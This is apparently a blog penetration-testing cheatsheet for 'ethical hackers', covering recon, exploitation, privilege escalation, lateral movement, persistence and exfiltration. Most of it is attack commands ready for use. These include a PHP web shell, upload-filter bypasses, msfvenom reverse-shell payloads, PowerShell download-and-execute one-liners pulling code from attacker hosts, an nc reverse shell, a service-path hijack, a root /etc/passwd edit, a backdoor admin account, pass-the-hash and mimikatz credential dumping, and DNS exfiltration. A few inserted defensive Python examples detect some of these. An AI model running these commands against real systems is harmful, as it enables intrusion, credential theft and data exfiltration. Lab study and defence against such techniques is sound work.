This is the pentest cheatsheet for ethical hackers. It is a living document which grows and refines over time like an aged whiskey.
Want to try out pentesting yourself? This is the workhorse virtual lab setup and configuration I use for testing.
To make your own hacking lab, see my guide Set Up A Domain Controller to Hack At Home.
Setting up for reporting
My reporting tool of choice is CherryTree, mostly because KeepNote is no longer installed by default and it is known to crash. When you have done a ton of work and it is erased by a crash, that is no fun at all. The only remaining problem is how to get screenshots into CherryTree. The steps are simple. First I install gnome-screenshot, which does not come installed by default: apt install gnome-screenshot. Next, open the Keyboard settings app and create a new shortcut for it; give it something unique as I did. Now open CherryTree and paste the new screenshot into an open node/sub-node.
Add New Executables to PATH
You get new tools with a git clone of a GitHub repo, and I usually then add the tool's directory to my PATH by editing /root/.bashrc as follows:
# add to PATH
export PATH=$PATH:/usr/bin/dirsearch
# restart .bashrc shell settings
$ source /root/.bashrc
Phase I: Information Gathering
A favorite Nmap scan that scans all ports 1-65535 (-p-), detects service versions (-sV) and writes the output in all formats (-oA).
nmap -sV -p- -oA nmap/this-new-scan 192.168.56.101
Nmap NSE Scripts
Locate the nmap NSE scripts to use them.
locate "*.nse"
Nmap Script Scan for SMB
nmap -p- -A --script="smb-vuln*" $target
# works more often
nmap -p 445 --script=vuln $target
Nmap Script Scan for WebDAV
Run scan for WebDAV enabled devices.
nmap --script http-webdav-scan $target
For fast yet thorough nmap scans try this.
$ nmap -p 1-65535 -T4 -A -v 10.0.0.1
Or this always-useful combination of flags.
$ nmap -sC -sV -oA nmaps/new-nmap 10.0.0.1
Goscan
Try using GoScan.
https://github.com/marco-lancini/goscan
Bash Pingsweep
Using bash to do a ping sweep of the local subnet.
for i in $(seq 1 255); do ping -c 1 10.x.x.$i; done
Telnet
Using telnet for banner grabbing: connect to the service port and read whatever it sends.
telnet $ip $port
Auxiliary Metasploit Modules
Show auxiliary modules installed.
show auxiliary
use auxiliary/scanner/smb/smb_version
AutoRecon
Get AutoRecon by Tib3rius. I have spoken with the author and many others say it is the best as well.
git clone https://github.com/Tib3rius/AutoRecon
pip3 install -r ~/AutoRecon/requirements.txt
chmod +x ~/AutoRecon/src/autorecon/autorecon.py
# add the script's directory (not the script file) to PATH
echo 'export PATH=$PATH:~/AutoRecon/src/autorecon' >> ~/.bashrc
source ~/.bashrc
autorecon.py <target>
Onetwopunch
Get onetwopunch from the Github repo.
git clone https://github.com/superkojiman/onetwopunch
cp onetwopunch/onetwopunch.sh /usr/bin
root@kali:~# onetwopunch.sh -t ips.txt tcp
Reconnoitre
Get Reconnoitre for automated intel gathering.
git clone https://github.com/codingo/Reconnoitre.git
cd Reconnoitre
python setup.py install
reconnoitre -t 192.x.x.x -o /root/targets-intel --services
reconnoitre -t 192.x.x.x -o /root/targets-intel --services --pingsweep
reconnoitre -t 192.x.x.x -o /root/targets-intel --pingsweep --hostnames
Netcat for Port Scanning
$ echo 10.0.0.1 > hostlist.txt
$ while read line; do nc -v -z $line 1-65535; done < hostlist.txt
$ echo 1-65535 > portlist.txt
$ while read port; do nc -v -z 192.168.0.15 $port; done < portlist.txt
DNS Enumeration
Get basic name-resolution information: nbtscan and nmblookup query NetBIOS names, and nmap probes UDP/53 for DNS servers.
# use nbtscan
nbtscan $ip
# use nmblookup
nmblookup $ip
# nmap
nmap -sU -p 53 $ip_range -vv -oA dns-scan
DNS Zone Transfer
# find DNS servers
host -t ns domain | cut -d " " -f 4
# zone transfer request
host -l domain dns-server-name
Using DNSRecon and DNSEnum
# dnsrecon
dnsrecon -d domain -t axfr
# dnsenum
dnsenum domain
Web Target Enumeration
Use gobuster.
Here is an example to use when general web/Apache technologies are present.
gobuster -w /root/SecLists-master/Discovery/Web-Content/common.txt -u http://target
And another to use against Microsoft SQL Server instances.
gobuster -w /usr/share/wordlists/dirbuster/directory-list-lowercase-1.0.txt -u http://target
Updated 11-2019
gobuster dir -u http://10.0.0.2 -w ~/seclists/Discovery/Web-Content/common.txt -v
Install gobuster.
$ cd ~/Downloads
$ sudo tar -C /usr/local -xzf go1.12.7.linux-amd64.tar.gz
# add to PATH (append these lines to /root/.bashrc)
$ nano /root/.bashrc
export PATH=$PATH:/usr/local/go/bin
export PATH=$PATH:$(go env GOPATH)/bin
export GOPATH=$(go env GOPATH)
$ source /root/.bashrc
# get the package
$ go get github.com/OJ/gobuster
# install
$ cd ~/go/src/github.com/OJ/gobuster
$ go install
Or get the Debian package.
$ sudo apt-get install gobuster -y
Use gobuster to find common web files.
# use seclists common discovery list
gobuster -w seclist/Discovery/Web-Content/common.txt -u http://10.1.1.1
Use dirsearch.
git clone https://github.com/maurosoria/dirsearch.git
cd dirsearch
python3 dirsearch.py -u <URL> -e <EXTENSION> -w words
python3 dirsearch.py -u http://10.0.0.2 -e html,aspx,php
Gobuster by design does not allow a recursive option.
git clone https://github.com/epi052/recursive-gobuster
./recursive-gobuster/recursive-gobuster.pyz http://10.0.0.158
Active Directory Enumeration
Install winldapsearch. You may need some dependencies first.
sudo apt-get install libsasl2-dev python-dev libldap2-dev libssl-dev
sudo pip3 install python-ldap
Whatweb
Use whatweb to enumerate the webserver running the web application.
$ whatweb 10.0.0.1
MS SQL Exploitation
Using Metasploit.
msf > use windows/mssql/mssql_payload
Here is how to connect to an MS SQL Server from Kali Linux.
sqsh -S [SQL_SERVER]
NFS Exploitation
Network File System (NFS) is a Unix network file-sharing service.
# using rpcinfo to see which RPC services (nfs, mountd) are registered
$ rpcinfo -p 10.0.0.1
# showmount will list exported folders
$ showmount -e 10.0.0.1
# display mount points
$ showmount -a 10.0.0.1
# display exported directories
$ showmount -d 10.0.0.1
# mount the share
$ mount -t nfs 10.0.0.1:/ /mnt/tmp -o nolock
# verify new mount point
$ df -k
WordPress Exploitation
wpscan --url http://10.1.1.1/wp-login --passwords fsocity.dic -U elliot
Sometimes enumerating plugins requires aggressive detection mode.
wpscan --url http://10.10.10.88/webservices/wp/ --enumerate p,u --plugins-detection aggressive
Try enumerating users.
wpscan --url $url --enumerate u
Exploiting a WordPress site can be done by injecting a PHP shell into a PHP file in the theme, such as archive.php. The script can then be called by browsing to wp-content/themes/themename/script.php while a listener is open at the same time.
Enumerating Users
Using the finger service.
http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz
$ finger-user-enum.pl -t $target -U /wordlist.txt
$ finger [email protected]
Get ident-user-enum for when you find TCP port 113 (the ident protocol) open.
pentestmonkey.net/tools/user-enumeration/ident-user-enum
Vulnerability Scanners
Openvas
Install and use openvas.
sudo apt-get install openvas -y
openvas-setup
openvas-start
# then browse to the web UI
127.0.0.1:9392
Nessus
Read the huge article I made for Nessus!
SNMP Enumeration
https://github.com/dheiland-r7/snmp
You can use
Phase II: Exploitation
DNSAdmins Group Exploit
dnscmd.exe FQDN /config /serverplugindll \\kali-ip\share\myplugin.dll
sc.exe FQDN stop dns
sc.exe FQDN start dns
Freerdp
xfreerdp /u:cjosh4751 /p:iamgreat$1 /v:10.0.0.184
WebDAV Exploitation
Use cadaver.
cadaver http://10.0.0.1/webdav
Put a reverse shell on the webserver.
# single quotes so the shell does not expand $_REQUEST
echo '<?php system($_REQUEST["cmd"]); ?>' > /tmp/shell.php
put /tmp/shell.php
http://10.x.x.x/webdav/shell.php?cmd=ipconfig
File Upload Bypass Techniques
There are times when uploading a file with a certain extension is forbidden; upload it under an allowed name and rename it on the server.
$ cadaver 10.0.0.1
dav:/ move my-shell.txt my-shell.php
dav:/ move my-shell.txt my-shell.asp;.txt
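From the defender's side, the rename trick above works because the server checks only the last extension or stops parsing at the ';'. Added example (not from the original page): a Python allowlist check for stored upload names that rejects both tricks; the allowlist and function names are my own constructions.

```python
import os
import re

# Constructed allowlist: what this upload handler is willing to store.
ALLOWED_EXTENSIONS = {"txt", "png", "jpg", "pdf", "gz"}

# Extensions a web server may execute if they appear anywhere in the name
# (Apache's mod_mime treats every dot-separated segment as an extension).
EXECUTABLE_EXTENSIONS = {"php", "php3", "php5", "phtml", "asp", "aspx", "jsp", "cgi", "pl"}

# One base name plus one or two short extension segments, nothing else.
SAFE_NAME = re.compile(r"^[a-z0-9_-]{1,64}(\.[a-z0-9]{1,8}){1,2}$")


def is_safe_upload_name(filename: str) -> bool:
    """Return True only if the stored name cannot become an executable script.

    Rejects the two rename tricks shown above (my-shell.php and
    my-shell.asp;.txt) as well as null-byte truncation and path components.
    """
    # Drop any path the client supplied; only the final component is stored.
    name = os.path.basename(filename.replace("\\", "/")).lower()
    # ';' and NUL both end the name early for some servers and parsers,
    # so whatever follows them is never inspected by a naive check.
    if not name or ";" in name or "\x00" in name:
        return False
    if not SAFE_NAME.match(name):
        return False
    segments = name.split(".")
    # Every segment after the base name must be harmless, not just the last one.
    if any(seg in EXECUTABLE_EXTENSIONS for seg in segments[1:]):
        return False
    return segments[-1] in ALLOWED_EXTENSIONS


def classify_uploads(filenames: list) -> dict:
    """Map each submitted name to 'accept' or 'reject' for logging and alerting."""
    return {f: ("accept" if is_safe_upload_name(f) else "reject") for f in filenames}
```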
FTP Exploitation
See what accounts are present.
nmap -p 21 --script "ftp*" $target
Use hydra to crack user accounts.
hydra -L /root/seclist/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt 10.1.1.1 ftp
SMTP Exploitation
Use smtp-user-enum to enumerate users on the system.
$ smtp-user-enum -M VRFY -U wordlist -t 10.0.0.1
Use nmap scripts to enumerate users.
$ nmap -p 25 --script smtp-enum-users.nse 10.0.0.1
Use Metasploit's auxiliary smtp module.
use auxiliary/scanner/smtp/smtp_enum
SMB Exploitation
Use crackmapexec.
Basic discovery.
$ apt-get install crackmapexec
$ crackmapexec smb 10.0.0.0/24
Using credentials.
$ crackmapexec smb 10.0.0.0/24 -u admin -p password
Using Pass-the-Hash technique.
$ crackmapexec smb 10.0.0.0/24 -u admin -H <ntlm-hash>
One starting point for SMB exploitation is finding the version of the SMB service running, for example Samba 2.x.x.
# use nbtscan
$ nbtscan $target
# use nmblookup
$ nmblookup -A 192.168.1.144
Looking up status of 192.168.1.144
VULNSHARE02 <00> - B <ACTIVE>
# use smbclient: -L lists shares, -N means anonymous (no password) login
smbclient -L $target -N
# list shares by NetBIOS name or IP
$ smbclient -L <netbios-name-or-ip>
# connect to a share with a password, or without one (-N)
$ smbclient //192.168.1.144/c$ -U user%PASSWORD
$ smbclient -N //192.168.1.144/c$
Use smbmap.
smbmap -H $target -u admin -p password
For brute forcing the shares' credentials use hydra.
hydra -L users-list.txt -P /usr/share/wordlists/metasploit/unix_passwords 192.x.x.x smb
Enumerate Samba shares across the network using smbmap.
smbmap -u john316 -p password123 -H 192.x.x.x
Use smbclient to access shares with READ/WRITE access.
smbclient //10.1.1.1/sharename
Enumerate users using nmap scripts.
nmap --script smb-enum-users.nse -p 445 10.1.1.1
Brute force smb logins: using nmap.
nmap -vv -p 139,445 --script=smb-brute 10.0.2.18
Using medusa.
medusa -h 10.0.2.18 -P /usr/share/wordlists/rockyou.txt -U /root/seclist/Usernames/top-usernames-shortlist.txt -M smbnt
Compiling Exploits
If you need to compile using gcc try these:
sudo apt-get install gcc-multilib
There are many flags that can be used; for example, to compile for 32-bit targets try these:
-m32 (32 bit target)
-Wl,--hash-style=both (include both gnu and sysv hashtables - Wl, passes comma separated arguments to the linker)
Additionally to cross compile:
# install mingw cross-compiler
sudo apt-get install mingw-w64
# compile a 32-bit Windows exe
i686-w64-mingw32-gcc -o exploit.exe exploit.c
# compile a 64-bit Windows exe
x86_64-w64-mingw32-gcc -o exploit.exe exploit.c
Searching In Searchsploit
Mirror (copy) the exploit into the current directory.
searchsploit -m exploit-number
Print the exploit to the screen. BE WARNED: this will open in vim, so use esc + q to exit.
searchsploit -x exploit-number
Run Popular Exploits
For running exploits on targets vulnerable to EternalBlue (MS17-010):
git clone https://github.com/3ndG4me/AutoBlue-MS17-010
cd AutoBlue-MS17-010/shellcode
sh prep.sh
Use Impacket
Setup is simple.
git clone https://github.com/SecureAuthCorp/impacket
cd impacket
python setup.py install
python wmiexec.py admin:[email protected]
Impacket – Move Files Post Exploit
smbserver.py -comment 'SHARE 01 Says Hi' SHARENAME /dir-to-share
Combining smbserver.py with the Windows copy command is a no-brainer, since copy is native to Windows.
Impacket – Get Compiled Version
Get the executable version of Impacket from github. All the scripts found in Impacket have been compiled for Windows and are hosted on this repository.
Web App Exploitation
If there is an application running that is susceptible to SQL injection, try these.
' or '1'='1
Netcat
Put simply, netcat is a *nix tool that lets the user read from and write to TCP or UDP connections. Start the listener on the Windows host first, or in a shell via Metasploit:
netcat.exe -nlvp 4400
Then on the Kali host connect to it:
root@kali:~# nc -nv 10.x.x.x 4400
Sending Files with Netcat
On the sending side:
nc -v $destination_ip $port < file
On the receiving side:
nc -lvp $port > file
Cracking weak passwords
SecLists
Get SecLists for custom wordlists for brute forcing services.
wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip && unzip SecList.zip && rm -f SecList.zip
Use John's builtin wordlist.
cp /usr/share/john/password.lst /root
Using ncrack.
ncrack -v 10.x.x.x:3389 --user admin -P /usr/share/wordlists/rockyou.txt
Using hashcat.
hashcat -m 1000 hashes-to-crack.txt /usr/share/wordlists/rockyou.txt
Using brutespray.
sudo apt install brutespray
# feed a recent nmap scan into spray and set service as ftp
brutespray --file top-20-ports-scan.xml --threads 20 -s ftp
Upgrading Your Shell
Try python-pty-shells.
https://github.com/infodox/python-pty-shells
Use Python if it is installed on the remote machine.
python -c 'import pty; pty.spawn("/bin/bash")'
Client-Side Attack
To run an msfvenom payload for a reverse shell on the client.
root@kali:~# systemctl start postgresql
root@kali:~# msfdb init
# msfvenom runs from the shell, not from inside msfconsole
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.x.x.x -f exe -o /var/www/reverse_shell.exe
# serve the payload with Python's built-in web server or with Apache
root@kali:~# cd /var/www
root@kali:/var/www# python -m SimpleHTTPServer 8000
root@kali:~# service apache2 start
root@kali:~# msfconsole
msf > workspace -a scenario_1
msf > workspace scenario_1
Then start the listener: netcat, or Metasploit's multi/handler as shown here.
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
meterpreter > shell
Process 3912 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
Not a root level user, just a regular AD user.
C:\Users\Sam\Desktop>whoami
sam-pc\sam
C:\Users\Sam\Desktop> exit
Payload Generation
Msfvenom payloads come in staged and unstaged (stageless) forms. Staged payloads need a multi/handler listener, while unstaged payloads do not.
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=443 -f raw > shell-rev.php
UNSTAGED
msfvenom -p windows/shell_reverse_tcp -f <c|python|raw> LHOST=<ip> LPORT=<port>
msfvenom -p windows/x64/shell_reverse_tcp -f <c|python|raw> LHOST=<ip> LPORT=<port>
STAGED
msfvenom -p windows/shell/reverse_tcp -f <c|python|raw> LHOST=<ip> LPORT=<port>
Special PHP shells.
https://github.com/flozz/p0wny-shell
Phase III: Privilege Escalation
Windows Privilege Escalation
The Windows equivalent of the Linux cat command is type.
type flag.txt
See the current user.
echo %USERNAME%
See all users.
net users
Get accesschk.exe (Sysinternals).
wget https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
Do a search for the Windows local user access control exploit, "bypassuac".
msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac
msf5 exploit(windows/local/bypassuac) > show options
msf5 exploit(windows/local/bypassuac) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/bypassuac) > run
Certutil to Move Files
certutil.exe -urlcache -split -f http://10.0.0.1/test.txt test.txt
Using cscript
cscript wget.vbs http://10.0.0.2/shell.ps1 shell.ps1
Win Priv Esc – PowerSploit
Win Priv Esc – PowerTools
PowerShell
Moving Files to the Victim with PowerShell
In terms of working with tools native to Windows, PowerShell takes the cake. In other words, it's a great way to move the attack sequence along without onboarding a lot of tools to the victim machine. Just for kicks we moved wget over to the Windows machine using netcat. PowerShell is installed by default on Windows hosts and has a pretty simple syntax for creating the one-liners we need to exploit further.
meterpreter > shell
C:\Windows\System32>cmd.exe
C:\Windows\System32>powershell
C:\Windows\System32>powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://10.x.x.x:8000/reverse_shell.exe','C:\Windows\Temp\patch.exe')
PowerSploit
Invoke-Shellcode (its name has been written differently in the past; the author likes to remind people to watch what they download freely from the internet) can be loaded into memory, thus avoiding writing anything at all to disk.
C:\> powershell -exec bypass -c IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1")
With a PowerShell session already open on the target you can download further files.
PS c:\lowuser> IEX (New-Object Net.WebClient).downloadString('http://{kali ip addr}:8000/file.ps1')
PowerUp
Get PowerUp.ps1 onto the target or run the module in memory by using the following commands.
c:\>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.0.0.2:80/PowerUp.ps1') ; Invoke-AllChecks"
c:\>powershell.exe -ExecutionPolicy Bypass -noLogo -Command "IEX(New-Object Net.WebClient).downloadString('http://10.0.0.2:80/powerup.ps1') ; Invoke-AllChecks"
Alternatively once you have a PS session open on the target this will work as well.
PS C:\Users\bob\> IEX(New-Object Net.WebClient).downloadString('http://10.0.0.250/PowerUp.ps1'); Invoke-AllChecks
To run PowerUp.ps1 when it is already on the target, run the following:
c:\>powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
iwr -Uri http://kali:80/powerview.ps1 -OutFile /tmp/powerview.ps1
Try using Sherlock or JAWS.
Sherlock
git clone https://github.com/rasta-mouse/Sherlock
Get Sherlock.ps1 onto the target or run the module in memory by using the following commands.
c:\>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.0.0.2:80/Sherlock.ps1') ; Find-AllVulns"
Or if you have a PS session already opened use it this way.
IEX(New-Object Net.WebClient).downloadString('http://10.0.0.250/Sherlock.ps1') ; Find-AllVulns
First host Sherlock.ps1 on your Kali machine and transfer it to the target. To use Sherlock, call it from a terminal shell on the target:
powershell -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}"
Yet another way to run Sherlock.
c:\> powershell -ep bypass
PS C:\> Import-Module .\Sherlock.ps1
PS C:\> Find-AllVulns
Watson
Watson is the updated version of Sherlock.
# get dependencies to compile
apt-get install -y nuget mono-devel mono-xbuild
# build the sln file
xbuild Watson.sln
# where to find compiled exe
/Watson-2.0/Watson/bin/Debug/watson.exe
To get the compiled binary onto the host use wget (an alias of Invoke-WebRequest in PowerShell).
PS > wget http://10.0.0.250/watson.exe -OutFile patch.exe
PS > ./patch.exe
JAWS
https://github.com/411Hall/JAWS
Windows Exploit Suggester
To use Windows Exploit Suggester, first run a command on the Windows shell to get the systeminfo command output.
C:\lowuser> systeminfo
Copy the output of this command into a text file name it sysinfo.txt and proceed.
# clone the repo
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester
# update the local db
python windows-exploit-suggester.py --update
Now use it to identify vulnerabilities. The --update command downloaded the Microsoft security bulletin database locally, so this runs on Kali.
root@kali:~# python windows-exploit-suggester.py --systeminfo sysinfo.txt --database 2019-11-22-mssb.xls
You may need to install a dependency, to do so:
pip install xlrd
Python missing? Try Windows-exploit-suggester as a standalone binary.
root@kali:~# pyinstaller --onefile windows-exploit-suggester.py
cp windows-exploit-suggester.exe /usr/share/windows-binaries/wes.exe
Nishang
git clone https://github.com/samratashok/nishang
PSAttack
https://github.com/jaredhaight/PSAttack
Pre-compiled versions of common Windows exploits can be downloaded.
https://github.com/SecWiki/windows-kernel-exploits
Powerline
Get Powerline to target.
certutil -urlcache -split -f http://10.0.0.250/PowerLine.exe PowerLine.exe
Use Powerline to get a reverse shell.
PowerLine.exe Invoke-PowerShellTcp "Invoke-PowerShellTcp -Reverse -IPAddress 10.0.0.250 -Port 4444"
Powerview
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
Internal Monologue
C:\>powershell.exe -nop "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/eladshamir/Internal-Monologue/master/Invoke-InternalMonologue.ps1');"
CVE-2019-1322 Windows 10 UsoSvc Exploit
PS C:\spongebob> sc.exe stop UsoSvc
PS C:\spongebob> sc.exe config usosvc binPath="C:\Users\writeable\nc.exe 10.0.0.1 6666 -e cmd.exe"
PS C:\spongebob> sc.exe start UsoSvc
Linux Privilege Escalation
Get linpeas
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
Get a script to suggest exploits.
https://www.securitysift.com/download/linuxprivchecker.py
Get linux-smart-enumeration tool.
https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh
Get linenum tool.
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
Get Roothelper.
https://github.com/NullArray/RootHelper
Find binaries with the SUID and SGID bits set. These allow a normal user to run them with the privileges of the file's owner (or owning group).
find / -user root -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# where SUID and SGID are both set
find / -perm -6000 -type f 2>/dev/null
Use automated tools whenever possible. Make sure you try out linuxprivchecker.py
git clone https://github.com/sleventyeleven/linuxprivchecker
Make the current user root. If you are able to write to /etc/passwd and you have the password for the current user, you can elevate that user to root.
# change the uid and gid to 0 for root
bobby:x:0:0::/home/bobby:/bin/sh
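The defender's counterpart to the /etc/passwd edit above is to audit the file for a second uid-0 account, a gid-0 account, or a hash stored in passwd instead of shadow. Added example (not from the original page): a Python audit over a constructed passwd sample; the sample contents and function names are my own.

```python
from typing import Dict, List

# Constructed sample /etc/passwd after the edit described above: "bobby" has had
# uid and gid set to 0. "legacy" carries a hash in passwd instead of shadow.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bobby:x:0:0::/home/bobby:/bin/sh
legacy:$6$saltsalt$notarealhash:1001:1001::/home/legacy:/bin/bash
"""


def parse_passwd(text: str) -> List[Dict[str, object]]:
    """Split passwd(5) lines into field dicts, keeping malformed lines visible."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"line": lineno, "malformed": True, "raw": line})
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        entries.append({"line": lineno, "malformed": False, "name": name, "pw": pw,
                        "uid": uid, "gid": gid, "home": home, "shell": shell})
    return entries


def audit_passwd(text: str) -> List[str]:
    """Return one finding per suspicious entry; an empty list means nothing odd."""
    findings: List[str] = []
    by_uid: Dict[str, List[str]] = {}
    for e in parse_passwd(text):
        if e["malformed"]:
            findings.append(f"line {e['line']}: malformed entry {e['raw']!r}")
            continue
        name, pw, uid, gid = e["name"], e["pw"], e["uid"], e["gid"]
        if not uid.isdigit() or not gid.isdigit():
            findings.append(f"{name}: non-numeric uid/gid")
            continue
        # The edit shown above: any non-root account with uid 0 is a second root.
        if uid == "0" and name != "root":
            findings.append(f"{name}: uid 0 but not root")
        if gid == "0" and name != "root":
            findings.append(f"{name}: gid 0 but not root")
        # A writable passwd also lets a hash be placed here, bypassing /etc/shadow.
        if pw == "":
            findings.append(f"{name}: empty password field (no password required)")
        elif pw not in ("x", "*") and not pw.startswith("!"):
            findings.append(f"{name}: password hash stored in /etc/passwd")
        by_uid.setdefault(uid, []).append(name)
    for uid, names in by_uid.items():
        if len(names) > 1:
            findings.append(f"uid {uid} shared by {', '.join(names)}")
    return findings
```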
List Out Files Properly
This is the best way to do it.
find /home -printf "%f\t%p\t%u\t%g\t%m\t%n\n" 2>/dev/null | column -t
Use linuxprivchecker.
git clone https://github.com/sleventyeleven/linuxprivchecker
cd linuxprivchecker
chmod 700 linuxprivchecker.py
python linuxprivchecker.py
Reverse Shell One Liners
# pentestmonkey one-liner, for when nc -e is an invalid option (credit: jeff price)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.100 4444 >/tmp/f
Cracking Passwords
How to crack the passphrase of a found SSH RSA key
Use ssh2john to convert the key into a crackable hash, then john to crack it.
wget https://raw.githubusercontent.com/koboi137/john/bionic/ssh2john.py
python ssh2john.py key > crackme.txt
john --wordlist=/usr/share/yourwords crackme.txt
Persistence
Using the net command, add a new user. Then, using the same command, add the newly created user to the local administrators group.
meterpreter > sessions 2
meterpreter > shell
C:\Windows\System32>net user /add evil password
The command completed successfully.
C:\Windows\System32>net localgroup administrators evil /add
The command completed successfully.
Phase IV: Moving Laterally
Pass-the-Hash
pth-winexe -U domain.local/Administrator%HASH(NT/NTLM) //hostname.local cmd.exe
Meterpreter Shell
load kiwi
creds_all
load mimikatz
mimikatz_command -f samdump::hashes
Psexec
psexec \\$ip cmd.exe
Have Creds?
Use psexec from Impacket and open a new shell as another user.
python psexec.py testlab.local/Administrator:[email protected] cmd
CredNinja
Your output may look different, because I added a line in the Python script to print the command.
root@kali:~ python3 CredNinja.py -a accounts.txt -s servers.txt --valid
['smbclient', '-U', 'ethicalhackingguru\\\\Administrator', '\\\\10.x.x.x\\c$', 'Password123!', '-c', 'dir', '-m', 'SMB3']
10.x.x.x ethicalhackingguru\\Administrator Password123! LOCAL ADMIN! Valid
Runas
Using runas with /netonly: the process runs locally but authenticates as another user over the network.
C:\Users\skippy>runas /netonly /user:ethicalhackingguru\administrator cmd.exe
A new terminal is now open running cmd.exe as administrator (authenticating as ethicalhackingguru\administrator).
SSH
Connecting to the target with the found passphrase and an RSA private key can be useful.
ssh -i rsa.key [email protected]
Phase V: Exfiltration
DNSteal
root@kali:~# git clone https://github.com/m57/dnsteal
python dnsteal.py 127.0.0.1 -z -s 4 -b 57 -f 17
DNSteal runs a DNS server that listens for incoming DNS requests. By binding a network socket to port 53, the tool receives these requests and uses them to move data. It prints the commands used to talk to the server; notice that they are regular *nix DNS commands. In other words, dig is used to exfiltrate files and folders.
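Because the data rides inside ordinary-looking queries, the detection side looks at query names rather than at the server: long or high-entropy labels, roomy record types, and one client asking for many never-repeated subdomains. Added example (not from the original page or the DNSteal project): a Python detector run over a constructed query-log sample; the log layout, domain names and thresholds are my own assumptions, not DNSteal's real encoding.

```python
import math
import re
from collections import defaultdict
from typing import Dict, List

# Constructed query-log sample in a BIND-like "client ... query:" layout. The
# three secrets.example.net lookups mimic file chunks carried as hex labels with
# a sequence number; the layout and data are made up, not DNSteal's real format.
SAMPLE_QUERIES = """\
client 10.0.0.5#51234: query: www.example.com IN A
client 10.0.0.5#51235: query: mail.example.com IN MX
client 10.0.0.7#40001: query: 4a6f686e2d646f652d7061737377642d.0.secrets.example.net IN TXT
client 10.0.0.7#40002: query: 6e73776f72642d2d2d2d2d2d2d2d2d2d.1.secrets.example.net IN TXT
client 10.0.0.7#40003: query: 726f6f743a783a303a303a2f726f6f74.2.secrets.example.net IN TXT
"""

QUERY_RE = re.compile(r"client (?P<src>[\d.]+)#\d+: query: (?P<name>\S+) IN (?P<qtype>\w+)")


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded data scores higher than words like 'mail'."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def score_name(name: str, qtype: str) -> List[str]:
    """Per-query indicators of data being carried in the query name itself."""
    labels = name.rstrip(".").split(".")
    longest = max(labels, key=len)
    reasons = []
    if len(name) > 60:
        reasons.append("long name")
    if len(longest) >= 30:
        reasons.append("long label")
    if len(longest) >= 16 and shannon_entropy(longest) > 3.0:
        reasons.append("high-entropy label")
    # Tunnels favour record types with roomy, free-form answers.
    if qtype in ("TXT", "NULL", "CNAME") and len(labels) > 3:
        reasons.append(f"{qtype} query with {len(labels)} labels")
    return reasons


def detect_exfil(log: str, min_unique: int = 3) -> Dict[str, List[str]]:
    """Return {query name: reasons} for names that look like exfiltration."""
    flagged: Dict[str, List[str]] = {}
    # (source ip, parent domain) -> distinct names asked under that parent
    per_parent: Dict[tuple, set] = defaultdict(set)
    for line in log.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        src, name, qtype = m.group("src", "name", "qtype")
        reasons = score_name(name, qtype)
        if reasons:
            flagged[name] = reasons
        parent = ".".join(name.rstrip(".").split(".")[-2:])
        per_parent[(src, parent)].add(name)
    # Volume indicator: one client asking for many never-repeated subdomains.
    for (src, parent), names in per_parent.items():
        if len(names) >= min_unique:
            for n in names:
                flagged.setdefault(n, []).append(f"{src} asked {len(names)} unique names under {parent}")
    return flagged
```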
Check Existing Guides
https://malikashish8.github.io/Walkthrough/notes/
https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70